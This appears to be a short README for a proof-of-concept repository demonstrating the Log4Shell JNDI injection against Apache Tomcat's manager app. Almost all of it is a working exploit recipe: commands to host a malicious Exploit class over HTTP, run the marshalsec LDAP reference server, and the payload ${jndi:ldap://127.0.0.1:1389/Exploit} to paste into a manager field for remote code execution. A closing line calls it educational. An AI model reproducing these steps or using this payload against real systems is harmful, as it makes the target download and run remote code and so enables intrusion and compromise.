git clone
cd apache-tomcat-10.0.14/bin
startup.bat
cd exploit
py -m http.server 8888
cd exploit
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"
Input ${jndi:ldap://127.0.0.1:1389/Exploit} in the field 'XML Configuration file path' inside http://localhost:8080/manager/html manager app
Exploit class is loaded and RCE loaded (Calculator app will be opened)
The repo is just a POC done for educational purpose. The repo owner is not responsible for any damages done. As a moral note, Don't be evil.
LDAP exploit https://github.com/mbechler/marshalsec